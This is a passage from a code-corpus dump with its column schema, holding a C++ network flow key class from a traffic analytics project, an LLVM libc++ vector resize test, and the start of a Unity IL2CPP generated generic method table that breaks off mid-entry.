blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
2
247
content_id
stringlengths
40
40
detected_licenses
listlengths
0
57
license_type
stringclasses
2 values
repo_name
stringlengths
4
111
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringlengths
4
58
visit_date
timestamp[ns]date
2015-07-25 18:16:41
2023-09-06 10:45:08
revision_date
timestamp[ns]date
1970-01-14 14:03:36
2023-09-06 06:22:19
committer_date
timestamp[ns]date
1970-01-14 14:03:36
2023-09-06 06:22:19
github_id
int64
3.89k
689M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
25 values
gha_event_created_at
timestamp[ns]date
2012-06-07 00:51:45
2023-09-14 21:58:52
gha_created_at
timestamp[ns]date
2008-03-27 23:40:48
2023-08-24 19:49:39
gha_language
stringclasses
159 values
src_encoding
stringclasses
34 values
language
stringclasses
1 value
is_vendor
bool
1 class
is_generated
bool
2 classes
length_bytes
int64
7
10.5M
extension
stringclasses
111 values
filename
stringlengths
1
195
text
stringlengths
7
10.5M
51b214f87bcd18c9cba42cde71d262c001b283ad
a78a8595878426b87e5b93b9d1431e0779e22bb8
/src/types/key.cc
a83696a16d622d8a1fe3eeec0034c761f265296d
[]
no_license
hecg119/starflow_analytics
f01a58b600dd8d059832c0744613ec36aea0e74d
ed3716e15498b19be11ca96eedfa8e71c20ac7c8
refs/heads/master
2021-08-24T07:28:43.312267
2017-12-08T16:41:21
2017-12-08T16:41:21
null
0
0
null
null
null
null
UTF-8
C++
false
false
2,388
cc
key.cc
#include "key.h" #include "../etc/format_helpers.h" #include <sstream> #include <string> #include <iomanip> #include <arpa/inet.h> starflow::types::Key::Key(u_char ip_p, in_addr ip_src, in_addr ip_dst, unsigned short th_sport, unsigned short th_dport) : ip_proto(static_cast<std::uint8_t>(ip_p)), ip_src(static_cast<std::uint32_t>(ip_src.s_addr)), ip_dst(static_cast<std::uint32_t>(ip_dst.s_addr)), th_sport(th_sport), th_dport(th_dport) { } starflow::types::Key::Key(std::uint8_t ip_p, std::uint32_t ip_src, std::uint32_t ip_dst, std::uint16_t th_sport, std::uint16_t th_dport) : ip_proto(ip_p), ip_src(ip_src), ip_dst(ip_dst), th_sport(th_sport), th_dport(th_dport) { } std::string starflow::types::Key::str_desc() const { std::string desc = "starflow::types::Key(ip_proto=" + std::to_string(ip_proto) + ", ip_src=" + etc::format_helpers::uint32_ip_addr_to_str(ip_src) + ", ip_dst=" + etc::format_helpers::uint32_ip_addr_to_str(ip_dst) + ", th_sport=" + std::to_string(th_sport) + ", th_dport=" + std::to_string(th_dport) + ")"; return desc; }; //function to print key to CSV for feature extraction std::string starflow::types::Key::str_desc_for_df() const { std::string desc = std::to_string(ip_proto) + "," + etc::format_helpers::uint32_ip_addr_to_str(ip_src) + "," + etc::format_helpers::uint32_ip_addr_to_str(ip_dst) + "," + std::to_string(th_sport) + "," + std::to_string(th_dport); return desc; } bool starflow::types::Key::operator==(const starflow::types::Key& b) const { return std::tie(ip_proto, ip_src, ip_dst, th_sport, th_dport) == std::tie(b.ip_proto, b.ip_src, b.ip_dst, b.th_sport, b.th_dport); } bool starflow::types::Key::operator<(const starflow::types::Key& b) const { return std::tie(ip_proto, ip_src, ip_dst, th_sport, th_dport) < std::tie(b.ip_proto, b.ip_src, b.ip_dst, b.th_sport, b.th_dport); } std::string starflow::types::Key::get_ip_src() const { return etc::format_helpers::uint32_ip_addr_to_str(ip_src); } std::string starflow::types::Key::get_ip_dst() const { return etc::format_helpers::uint32_ip_addr_to_str(ip_dst); } std::string starflow::types::Key::get_proto() const { return std::to_string(ip_proto); } std::string starflow::types::Key::get_sport() const { return std::to_string(th_sport); } std::string starflow::types::Key::get_dport() const { return std::to_string(th_dport); }
712dc0f3cdcde724595b4f57ff94134504821279
d4dc4989339f9ebf14bba2dce5132f4b77529bd3
/libcxx/test/std/containers/sequences/vector/vector.modifiers/resize.copy_only.pass.sh.cpp
b24736e22b6b1395456a85361b43838b9d5f73d3
[ "NCSA", "LLVM-exception", "MIT", "Apache-2.0" ]
permissive
gt-retro-computing/llvm-I8080
cb42cbb9e0b2dcab1aa1d74ed2fe3a205e607f89
78269777eb90c32420f577612480ab0de0a20f7a
refs/heads/i8080-MCLayer
2023-07-28T23:54:05.055069
2019-09-10T03:01:15
2019-09-10T03:01:15
183,099,460
13
4
null
2023-07-08T10:45:56
2019-04-23T21:35:01
C++
UTF-8
C++
false
false
1,023
cpp
resize.copy_only.pass.sh.cpp
//===----------------------------------------------------------------------===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// // UNSUPPORTED: c++98, c++03 // RUN: %build -fno-exceptions // RUN: %run // RUN: %build // RUN: %run // UNSUPPORTED: c++98, c++03 // <vector> // Test that vector won't try to call the move constructor when resizing if // the class has a deleted move constructor (but a working copy constructor). #include <vector> class CopyOnly { public: CopyOnly() { } CopyOnly(CopyOnly&&) = delete; CopyOnly& operator=(CopyOnly&&) = delete; CopyOnly(const CopyOnly&) = default; CopyOnly& operator=(const CopyOnly&) = default; }; int main() { std::vector<CopyOnly> x; x.emplace_back(); CopyOnly c; x.push_back(c); return 0; }
720077c20755e53e15ff92d7c5e45a608caaad79
01e9332fc35f009a31f7ce27bea17e5ecd3003aa
/Temp/il2cppOutput/il2cppOutput/Il2CppGenericMethodTable.cpp
74f55e5732ee6fbbe42062a5a515c0f85229530e
[]
no_license
tomSheep19/WireLoopAR
603c5f6b803a18dd9f32669b9d999790494c8a7a
f10d8cccd0ee8d196ea6f124f1b5bf74f326be6e
refs/heads/master
2021-08-16T18:23:07.082219
2017-11-20T07:07:53
2017-11-20T07:07:53
null
0
0
null
null
null
null
UTF-8
C++
false
false
509,089
cpp
Il2CppGenericMethodTable.cpp
#include "il2cpp-config.h" #ifndef _MSC_VER # include <alloca.h> #else # include <malloc.h> #endif #include <cstring> #include <string.h> #include <stdio.h> #include <cmath> #include <limits> #include <assert.h> #include "class-internals.h" #include "codegen/il2cpp-codegen.h" extern const Il2CppGenericMethodFunctionsDefinitions s_Il2CppGenericMethodFunctions[4671] = { { 0, 0/*NULL*/, 5/*5*/}, { 1, 0/*NULL*/, 1/*1*/}, { 2, 0/*NULL*/, 4/*4*/}, { 3, 0/*NULL*/, 4/*4*/}, { 4, 1/*(Il2CppMethodPointer)&Array_InternalArray__IEnumerable_GetEnumerator_TisRuntimeObject_m944375256_gshared*/, 4/*4*/}, { 5, 2/*(Il2CppMethodPointer)&Array_InternalArray__ICollection_Add_TisRuntimeObject_m1329963457_gshared*/, 90/*90*/}, { 6, 3/*(Il2CppMethodPointer)&Array_InternalArray__ICollection_Remove_TisRuntimeObject_m2425110446_gshared*/, 1/*1*/}, { 7, 4/*(Il2CppMethodPointer)&Array_InternalArray__ICollection_Contains_TisRuntimeObject_m4286375615_gshared*/, 1/*1*/}, { 8, 5/*(Il2CppMethodPointer)&Array_InternalArray__ICollection_CopyTo_TisRuntimeObject_m1162822425_gshared*/, 86/*86*/}, { 9, 6/*(Il2CppMethodPointer)&Array_InternalArray__Insert_TisRuntimeObject_m3029517586_gshared*/, 187/*187*/}, { 10, 7/*(Il2CppMethodPointer)&Array_InternalArray__IndexOf_TisRuntimeObject_m2440219229_gshared*/, 5/*5*/}, { 11, 8/*(Il2CppMethodPointer)&Array_InternalArray__get_Item_TisRuntimeObject_m371871810_gshared*/, 97/*97*/}, { 12, 9/*(Il2CppMethodPointer)&Array_InternalArray__set_Item_TisRuntimeObject_m870461665_gshared*/, 187/*187*/}, { 13, 0/*NULL*/, 1190/*1190*/}, { 14, 0/*NULL*/, 1190/*1190*/}, { 15, 10/*(Il2CppMethodPointer)&Array_get_swapper_TisRuntimeObject_m1701356863_gshared*/, 40/*40*/}, { 16, 11/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_m2295346640_gshared*/, 90/*90*/}, { 17, 12/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_TisRuntimeObject_m2775211098_gshared*/, 8/*8*/}, { 18, 13/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_m3309514378_gshared*/, 8/*8*/}, { 19, 14/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_TisRuntimeObject_m838950897_gshared*/, 206/*206*/}, { 20, 15/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_m143182644_gshared*/, 89/*89*/}, { 21, 16/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_TisRuntimeObject_m1915706600_gshared*/, 207/*207*/}, { 22, 17/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_m1954851512_gshared*/, 208/*208*/}, { 23, 18/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_TisRuntimeObject_m1526562629_gshared*/, 209/*209*/}, { 24, 19/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_m3674422195_gshared*/, 8/*8*/}, { 25, 20/*(Il2CppMethodPointer)&Array_Sort_TisRuntimeObject_m3717288230_gshared*/, 288/*288*/}, { 26, 21/*(Il2CppMethodPointer)&Array_qsort_TisRuntimeObject_TisRuntimeObject_m1340227921_gshared*/, 209/*209*/}, { 27, 22/*(Il2CppMethodPointer)&Array_compare_TisRuntimeObject_m1481822507_gshared*/, 199/*199*/}, { 28, 23/*(Il2CppMethodPointer)&Array_qsort_TisRuntimeObject_m1127107058_gshared*/, 208/*208*/}, { 29, 24/*(Il2CppMethodPointer)&Array_swap_TisRuntimeObject_TisRuntimeObject_m127996650_gshared*/, 207/*207*/}, { 30, 25/*(Il2CppMethodPointer)&Array_swap_TisRuntimeObject_m653591269_gshared*/, 89/*89*/}, { 31, 26/*(Il2CppMethodPointer)&Array_Resize_TisRuntimeObject_m4223007361_gshared*/, 1191/*1191*/}, { 32, 27/*(Il2CppMethodPointer)&Array_Resize_TisRuntimeObject_m1113434054_gshared*/, 1192/*1192*/}, { 33, 28/*(Il2CppMethodPointer)&Array_TrueForAll_TisRuntimeObject_m3052765269_gshared*/, 2/*2*/}, { 34, 29/*(Il2CppMethodPointer)&Array_ForEach_TisRuntimeObject_m1849351808_gshared*/, 8/*8*/}, { 35, 30/*(Il2CppMethodPointer)&Array_ConvertAll_TisRuntimeObject_TisRuntimeObject_m2423585546_gshared*/, 9/*9*/}, { 36, 31/*(Il2CppMethodPointer)&Array_FindLastIndex_TisRuntimeObject_m986818300_gshared*/, 28/*28*/}, { 37, 32/*(Il2CppMethodPointer)&Array_FindLastIndex_TisRuntimeObject_m3885928623_gshared*/, 37/*37*/}, { 38, 33/*(Il2CppMethodPointer)&Array_FindLastIndex_TisRuntimeObject_m869210470_gshared*/, 200/*200*/}, { 39, 34/*(Il2CppMethodPointer)&Array_FindIndex_TisRuntimeObject_m4149904176_gshared*/, 28/*28*/}, { 40, 35/*(Il2CppMethodPointer)&Array_FindIndex_TisRuntimeObject_m872355017_gshared*/, 37/*37*/}, { 41, 36/*(Il2CppMethodPointer)&Array_FindIndex_TisRuntimeObject_m965140358_gshared*/, 200/*200*/}, { 42, 37/*(Il2CppMethodPointer)&Array_BinarySearch_TisRuntimeObject_m2457435347_gshared*/, 28/*28*/}, { 43, 38/*(Il2CppMethodPointer)&Array_BinarySearch_TisRuntimeObject_m3361740551_gshared*/, 199/*199*/}, { 44, 39/*(Il2CppMethodPointer)&Array_BinarySearch_TisRuntimeObject_m4109835519_gshared*/, 200/*200*/}, { 45, 40/*(Il2CppMethodPointer)&Array_BinarySearch_TisRuntimeObject_m3048647515_gshared*/, 201/*201*/}, { 46, 41/*(Il2CppMethodPointer)&Array_IndexOf_TisRuntimeObject_m2032877681_gshared*/, 28/*28*/}, { 47, 42/*(Il2CppMethodPointer)&Array_IndexOf_TisRuntimeObject_m214763038_gshared*/, 204/*204*/}, { 48, 43/*(Il2CppMethodPointer)&Array_IndexOf_TisRuntimeObject_m1815604637_gshared*/, 205/*205*/}, { 49, 44/*(Il2CppMethodPointer)&Array_LastIndexOf_TisRuntimeObject_m1962410007_gshared*/, 28/*28*/}, { 50, 45/*(Il2CppMethodPointer)&Array_LastIndexOf_TisRuntimeObject_m3287014766_gshared*/, 204/*204*/}, { 51, 46/*(Il2CppMethodPointer)&Array_LastIndexOf_TisRuntimeObject_m2980037739_gshared*/, 205/*205*/}, { 52, 47/*(Il2CppMethodPointer)&Array_FindAll_TisRuntimeObject_m2420286284_gshared*/, 9/*9*/}, { 53, 48/*(Il2CppMethodPointer)&Array_Exists_TisRuntimeObject_m4244336533_gshared*/, 2/*2*/}, { 54, 49/*(Il2CppMethodPointer)&Array_AsReadOnly_TisRuntimeObject_m1721559766_gshared*/, 40/*40*/}, { 55, 50/*(Il2CppMethodPointer)&Array_Find_TisRuntimeObject_m1654841559_gshared*/, 9/*9*/}, { 56, 51/*(Il2CppMethodPointer)&Array_FindLast_TisRuntimeObject_m1794562749_gshared*/, 9/*9*/}, { 57, 52/*(Il2CppMethodPointer)&InternalEnumerator_1_System_Collections_IEnumerator_get_Current_m94051553_AdjustorThunk*/, 4/*4*/}, { 58, 53/*(Il2CppMethodPointer)&InternalEnumerator_1_get_Current_m3206960238_AdjustorThunk*/, 4/*4*/}, { 59, 54/*(Il2CppMethodPointer)&InternalEnumerator_1__ctor_m853313801_AdjustorThunk*/, 90/*90*/}, { 60, 55/*(Il2CppMethodPointer)&InternalEnumerator_1_System_Collections_IEnumerator_Reset_m3080260213_AdjustorThunk*/, 0/*0*/}, { 61, 56/*(Il2CppMethodPointer)&InternalEnumerator_1_Dispose_m1636767846_AdjustorThunk*/, 0/*0*/}, { 62, 57/*(Il2CppMethodPointer)&InternalEnumerator_1_MoveNext_m1047150157_AdjustorThunk*/, 43/*43*/}, { 63, 58/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_get_Item_m176001975_gshared*/, 97/*97*/}, { 64, 59/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_set_Item_m314687476_gshared*/, 187/*187*/}, { 65, 60/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_get_Count_m962317777_gshared*/, 3/*3*/}, { 66, 61/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_get_IsReadOnly_m2717922212_gshared*/, 43/*43*/}, { 67, 62/*(Il2CppMethodPointer)&ArrayReadOnlyList_1__ctor_m2430810679_gshared*/, 90/*90*/}, { 68, 63/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_System_Collections_IEnumerable_GetEnumerator_m2780765696_gshared*/, 4/*4*/}, { 69, 64/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_Add_m3970067462_gshared*/, 90/*90*/}, { 70, 65/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_Clear_m2539474626_gshared*/, 0/*0*/}, { 71, 66/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_Contains_m1266627404_gshared*/, 1/*1*/}, { 72, 67/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_CopyTo_m816115094_gshared*/, 86/*86*/}, { 73, 68/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_GetEnumerator_m1078352793_gshared*/, 4/*4*/}, { 74, 69/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_IndexOf_m1537228832_gshared*/, 5/*5*/}, { 75, 70/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_Insert_m1136669199_gshared*/, 187/*187*/}, { 76, 71/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_Remove_m1875216835_gshared*/, 1/*1*/}, { 77, 72/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_RemoveAt_m2701218731_gshared*/, 42/*42*/}, { 78, 73/*(Il2CppMethodPointer)&ArrayReadOnlyList_1_ReadOnlyError_m2289309720_gshared*/, 4/*4*/}, { 79, 74/*(Il2CppMethodPointer)&U3CGetEnumeratorU3Ec__Iterator0_System_Collections_Generic_IEnumeratorU3CTU3E_get_Current_m1791706206_gshared*/, 4/*4*/}, { 80, 75/*(Il2CppMethodPointer)&U3CGetEnumeratorU3Ec__Iterator0_System_Collections_IEnumerator_get_Current_m2580780957_gshared*/, 4/*4*/}, { 81, 76/*(Il2CppMethodPointer)&U3CGetEnumeratorU3Ec__Iterator0__ctor_m1015489335_gshared*/, 0/*0*/}, { 82, 77/*(Il2CppMethodPointer)&U3CGetEnumeratorU3Ec__Iterator0_MoveNext_m2489948797_gshared*/, 43/*43*/}, { 83, 78/*(Il2CppMethodPointer)&U3CGetEnumeratorU3Ec__Iterator0_Dispose_m1859988746_gshared*/, 0/*0*/}, { 84, 79/*(Il2CppMethodPointer)&U3CGetEnumeratorU3Ec__Iterator0_Reset_m2980566576_gshared*/, 0/*0*/}, { 85, 0/*NULL*/, 97/*97*/}, { 86, 0/*NULL*/, 187/*187*/}, { 87, 0/*NULL*/, 5/*5*/}, { 88, 0/*NULL*/, 187/*187*/}, { 89, 0/*NULL*/, 42/*42*/}, { 90, 0/*NULL*/, 3/*3*/}, { 91, 0/*NULL*/, 43/*43*/}, { 92, 0/*NULL*/, 90/*90*/}, { 93, 0/*NULL*/, 0/*0*/}, { 94, 0/*NULL*/, 1/*1*/}, { 95, 0/*NULL*/, 86/*86*/}, { 96, 0/*NULL*/, 1/*1*/}, { 97, 80/*(Il2CppMethodPointer)&Comparer_1_get_Default_m40106963_gshared*/, 4/*4*/}, { 98, 81/*(Il2CppMethodPointer)&Comparer_1__ctor_m4082958187_gshared*/, 0/*0*/}, { 99, 82/*(Il2CppMethodPointer)&Comparer_1__cctor_m2962395036_gshared*/, 0/*0*/}, { 100, 83/*(Il2CppMethodPointer)&Comparer_1_System_Collections_IComparer_Compare_m872902762_gshared*/, 28/*28*/}, { 101, 0/*NULL*/, 28/*28*/}, { 102, 84/*(Il2CppMethodPointer)&DefaultComparer__ctor_m84239532_gshared*/, 0/*0*/}, { 103, 85/*(Il2CppMethodPointer)&DefaultComparer_Compare_m2805784815_gshared*/, 28/*28*/}, { 104, 86/*(Il2CppMethodPointer)&GenericComparer_1__ctor_m1146681644_gshared*/, 0/*0*/}, { 105, 87/*(Il2CppMethodPointer)&GenericComparer_1_Compare_m78150427_gshared*/, 28/*28*/}, { 106, 88/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_get_Item_m237963271_gshared*/, 40/*40*/}, { 107, 89/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_set_Item_m3775521570_gshared*/, 8/*8*/}, { 108, 90/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_ICollection_get_IsSynchronized_m960517203_gshared*/, 43/*43*/}, { 109, 91/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_ICollection_get_SyncRoot_m1900166091_gshared*/, 4/*4*/}, { 110, 92/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_get_IsReadOnly_m4094240197_gshared*/, 43/*43*/}, { 111, 93/*(Il2CppMethodPointer)&Dictionary_2_get_Count_m3636113691_gshared*/, 3/*3*/}, { 112, 94/*(Il2CppMethodPointer)&Dictionary_2_get_Item_m2413909512_gshared*/, 40/*40*/}, { 113, 95/*(Il2CppMethodPointer)&Dictionary_2_set_Item_m1004257024_gshared*/, 8/*8*/}, { 114, 96/*(Il2CppMethodPointer)&Dictionary_2_get_Values_m825860460_gshared*/, 4/*4*/}, { 115, 97/*(Il2CppMethodPointer)&Dictionary_2__ctor_m584589095_gshared*/, 0/*0*/}, { 116, 98/*(Il2CppMethodPointer)&Dictionary_2__ctor_m2849528578_gshared*/, 90/*90*/}, { 117, 99/*(Il2CppMethodPointer)&Dictionary_2__ctor_m206582704_gshared*/, 42/*42*/}, { 118, 100/*(Il2CppMethodPointer)&Dictionary_2__ctor_m1206668798_gshared*/, 172/*172*/}, { 119, 101/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_Add_m984276885_gshared*/, 8/*8*/}, { 120, 102/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_Remove_m2017099222_gshared*/, 90/*90*/}, { 121, 103/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_Add_m990341268_gshared*/, 1193/*1193*/}, { 122, 104/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_Contains_m1058501024_gshared*/, 1194/*1194*/}, { 123, 105/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_CopyTo_m976354816_gshared*/, 86/*86*/}, { 124, 106/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_Remove_m1705959559_gshared*/, 1194/*1194*/}, { 125, 107/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_ICollection_CopyTo_m3578539931_gshared*/, 86/*86*/}, { 126, 108/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IEnumerable_GetEnumerator_m3100111910_gshared*/, 4/*4*/}, { 127, 109/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_IEnumerableU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_GetEnumerator_m2925090477_gshared*/, 4/*4*/}, { 128, 110/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_GetEnumerator_m2684932776_gshared*/, 4/*4*/}, { 129, 111/*(Il2CppMethodPointer)&Dictionary_2_Init_m1045257495_gshared*/, 187/*187*/}, { 130, 112/*(Il2CppMethodPointer)&Dictionary_2_InitArrays_m2270022740_gshared*/, 42/*42*/}, { 131, 113/*(Il2CppMethodPointer)&Dictionary_2_CopyToCheck_m2147716750_gshared*/, 86/*86*/}, { 132, 114/*(Il2CppMethodPointer)&Dictionary_2_Do_CopyTo_TisRuntimeObject_TisRuntimeObject_m1804181923_gshared*/, 288/*288*/}, { 133, 115/*(Il2CppMethodPointer)&Dictionary_2_make_pair_m2631942124_gshared*/, 1195/*1195*/}, { 134, 116/*(Il2CppMethodPointer)&Dictionary_2_pick_value_m1872663242_gshared*/, 9/*9*/}, { 135, 117/*(Il2CppMethodPointer)&Dictionary_2_CopyTo_m1495142643_gshared*/, 86/*86*/}, { 136, 118/*(Il2CppMethodPointer)&Dictionary_2_Do_ICollectionCopyTo_TisRuntimeObject_m4092802079_gshared*/, 288/*288*/}, { 137, 119/*(Il2CppMethodPointer)&Dictionary_2_Resize_m2672264133_gshared*/, 0/*0*/}, { 138, 120/*(Il2CppMethodPointer)&Dictionary_2_Add_m4209421183_gshared*/, 8/*8*/}, { 139, 121/*(Il2CppMethodPointer)&Dictionary_2_Clear_m2325793156_gshared*/, 0/*0*/}, { 140, 122/*(Il2CppMethodPointer)&Dictionary_2_ContainsKey_m3553426152_gshared*/, 1/*1*/}, { 141, 123/*(Il2CppMethodPointer)&Dictionary_2_ContainsValue_m2375979648_gshared*/, 1/*1*/}, { 142, 124/*(Il2CppMethodPointer)&Dictionary_2_OnDeserialization_m2160537783_gshared*/, 90/*90*/}, { 143, 125/*(Il2CppMethodPointer)&Dictionary_2_Remove_m112127646_gshared*/, 1/*1*/}, { 144, 126/*(Il2CppMethodPointer)&Dictionary_2_TryGetValue_m3975825838_gshared*/, 1196/*1196*/}, { 145, 127/*(Il2CppMethodPointer)&Dictionary_2_ToTKey_m4209561517_gshared*/, 40/*40*/}, { 146, 128/*(Il2CppMethodPointer)&Dictionary_2_ToTValue_m1381983709_gshared*/, 40/*40*/}, { 147, 129/*(Il2CppMethodPointer)&Dictionary_2_ContainsKeyValuePair_m663697471_gshared*/, 1194/*1194*/}, { 148, 130/*(Il2CppMethodPointer)&Dictionary_2_GetEnumerator_m1752238884_gshared*/, 1197/*1197*/}, { 149, 131/*(Il2CppMethodPointer)&Dictionary_2_U3CCopyToU3Em__0_m2061238213_gshared*/, 1198/*1198*/}, { 150, 132/*(Il2CppMethodPointer)&ShimEnumerator_get_Entry_m4233876641_gshared*/, 306/*306*/}, { 151, 133/*(Il2CppMethodPointer)&ShimEnumerator_get_Key_m3962796804_gshared*/, 4/*4*/}, { 152, 134/*(Il2CppMethodPointer)&ShimEnumerator_get_Value_m2522747790_gshared*/, 4/*4*/}, { 153, 135/*(Il2CppMethodPointer)&ShimEnumerator_get_Current_m2121723938_gshared*/, 4/*4*/}, { 154, 136/*(Il2CppMethodPointer)&ShimEnumerator__ctor_m119758426_gshared*/, 90/*90*/}, { 155, 137/*(Il2CppMethodPointer)&ShimEnumerator_MoveNext_m2013866013_gshared*/, 43/*43*/}, { 156, 138/*(Il2CppMethodPointer)&ShimEnumerator_Reset_m1100368508_gshared*/, 0/*0*/}, { 157, 139/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m229223308_AdjustorThunk*/, 4/*4*/}, { 158, 140/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Entry_m221119093_AdjustorThunk*/, 306/*306*/}, { 159, 141/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Key_m467957770_AdjustorThunk*/, 4/*4*/}, { 160, 142/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Value_m2325383168_AdjustorThunk*/, 4/*4*/}, { 161, 143/*(Il2CppMethodPointer)&Enumerator_get_Current_m25299632_AdjustorThunk*/, 1199/*1199*/}, { 162, 144/*(Il2CppMethodPointer)&Enumerator_get_CurrentKey_m3839846791_AdjustorThunk*/, 4/*4*/}, { 163, 145/*(Il2CppMethodPointer)&Enumerator_get_CurrentValue_m402763047_AdjustorThunk*/, 4/*4*/}, { 164, 146/*(Il2CppMethodPointer)&Enumerator__ctor_m3742107451_AdjustorThunk*/, 90/*90*/}, { 165, 147/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m3225937576_AdjustorThunk*/, 0/*0*/}, { 166, 148/*(Il2CppMethodPointer)&Enumerator_MoveNext_m3349738440_AdjustorThunk*/, 43/*43*/}, { 167, 149/*(Il2CppMethodPointer)&Enumerator_Reset_m3129803197_AdjustorThunk*/, 0/*0*/}, { 168, 150/*(Il2CppMethodPointer)&Enumerator_VerifyState_m262343092_AdjustorThunk*/, 0/*0*/}, { 169, 151/*(Il2CppMethodPointer)&Enumerator_VerifyCurrent_m1702320752_AdjustorThunk*/, 0/*0*/}, { 170, 152/*(Il2CppMethodPointer)&Enumerator_Dispose_m1905011127_AdjustorThunk*/, 0/*0*/}, { 171, 153/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_get_IsReadOnly_m1530798787_gshared*/, 43/*43*/}, { 172, 154/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_IsSynchronized_m3044620153_gshared*/, 43/*43*/}, { 173, 155/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_SyncRoot_m919209341_gshared*/, 4/*4*/}, { 174, 156/*(Il2CppMethodPointer)&ValueCollection_get_Count_m3718352161_gshared*/, 3/*3*/}, { 175, 157/*(Il2CppMethodPointer)&ValueCollection__ctor_m1801851342_gshared*/, 90/*90*/}, { 176, 158/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Add_m1477647540_gshared*/, 90/*90*/}, { 177, 159/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Clear_m573646175_gshared*/, 0/*0*/}, { 178, 160/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Contains_m1598273024_gshared*/, 1/*1*/}, { 179, 161/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Remove_m3764375695_gshared*/, 1/*1*/}, { 180, 162/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_IEnumerableU3CTValueU3E_GetEnumerator_m3036711881_gshared*/, 4/*4*/}, { 181, 163/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_CopyTo_m3792551117_gshared*/, 86/*86*/}, { 182, 164/*(Il2CppMethodPointer)&ValueCollection_System_Collections_IEnumerable_GetEnumerator_m1773104428_gshared*/, 4/*4*/}, { 183, 165/*(Il2CppMethodPointer)&ValueCollection_CopyTo_m927881183_gshared*/, 86/*86*/}, { 184, 166/*(Il2CppMethodPointer)&ValueCollection_GetEnumerator_m401908452_gshared*/, 1200/*1200*/}, { 185, 167/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m3933483934_AdjustorThunk*/, 4/*4*/}, { 186, 168/*(Il2CppMethodPointer)&Enumerator_get_Current_m4025002300_AdjustorThunk*/, 4/*4*/}, { 187, 169/*(Il2CppMethodPointer)&Enumerator__ctor_m3819430617_AdjustorThunk*/, 90/*90*/}, { 188, 170/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m2482663638_AdjustorThunk*/, 0/*0*/}, { 189, 171/*(Il2CppMethodPointer)&Enumerator_Dispose_m4238653081_AdjustorThunk*/, 0/*0*/}, { 190, 172/*(Il2CppMethodPointer)&Enumerator_MoveNext_m335649778_AdjustorThunk*/, 43/*43*/}, { 191, 173/*(Il2CppMethodPointer)&Transform_1__ctor_m3849972087_gshared*/, 211/*211*/}, { 192, 174/*(Il2CppMethodPointer)&Transform_1_Invoke_m1224512163_gshared*/, 9/*9*/}, { 193, 